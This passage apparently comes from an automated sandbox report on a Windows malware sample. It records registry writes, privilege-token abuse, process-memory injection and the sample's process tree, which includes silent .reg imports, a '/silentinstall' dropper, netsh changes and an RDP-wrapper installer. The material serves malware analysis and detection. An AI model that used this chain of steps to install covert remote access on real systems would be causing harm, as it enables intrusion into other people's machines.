Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CDNConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\InternetConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4180" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DODownloadMode = "1" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\GroupConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "2.209983" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "0.000000" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4316" C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization C:\Windows\System32\svchost.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\GeoVersion_EndpointFullUri = "https://geover.prod.do.dsp.mp.microsoft.com/geoversion" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\BkDownloadRatePct = "45" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkBps = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\DownloadMode_BackCompat = "1" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthID = "2" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\KVFileExpirationTime = "132893956823456449" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PeerInfoCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0" C:\Windows\System32\svchost.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadPendingCount = "0" C:\Windows\System32\svchost.exe N/A

Runs .reg file with regedit

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A
N/A N/A C:\Windows\SysWOW64\regedit.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeDebugPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeTcbPrivilege N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.19041.1220_none_7e21bc567c7ed16b\TiWorker.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\sys.exe N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A
N/A N/A C:\Program Files\CardWindows\MSIDrvs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1188 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 2176 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 3600 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Windows\SysWOW64\regedit.exe
PID 1188 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1872 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 1488 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1188 wrote to memory of 2980 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\MSIDrvs.exe
PID 1916 wrote to memory of 2584 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 3352 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 2584 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 3352 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 2584 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1916 wrote to memory of 3352 N/A C:\Program Files\CardWindows\MSIDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 1188 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1188 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1188 wrote to memory of 1708 N/A C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe C:\Program Files\CardWindows\sys.exe
PID 1708 wrote to memory of 3368 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 3368 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 1708 wrote to memory of 3368 N/A C:\Program Files\CardWindows\sys.exe C:\Windows\SysWOW64\cmd.exe
PID 3368 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 1152 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 220 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3412 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 2556 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 3368 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3368 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 3368 wrote to memory of 3048 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\netsh.exe
PID 2584 wrote to memory of 1628 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2584 wrote to memory of 1628 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 2584 wrote to memory of 1628 N/A C:\Program Files\CardWindows\SystemDrvs.exe C:\Program Files\CardWindows\SystemDrvs.exe
PID 3368 wrote to memory of 1872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 3368 wrote to memory of 1872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe
PID 3368 wrote to memory of 1872 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\RDPWInst.exe

Processes

C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe

"C:\Users\Admin\AppData\Local\Temp\d9b022178407327e2c1f8fad42adfff72580bc80f97f707ab1bdb4d3e510156c.exe"

C:\Windows\SysWOW64\regedit.exe

regedit /s "C:\Program Files\CardWindows\\regedit.reg"

C:\Windows\SysWOW64\regedit.exe

regedit /s "regedit.reg"

C:\Program Files\CardWindows\MSIDrvs.exe

"C:\Program Files\CardWindows\\MSIDrvs.exe" /silentinstall

C:\Program Files\CardWindows\MSIDrvs.exe

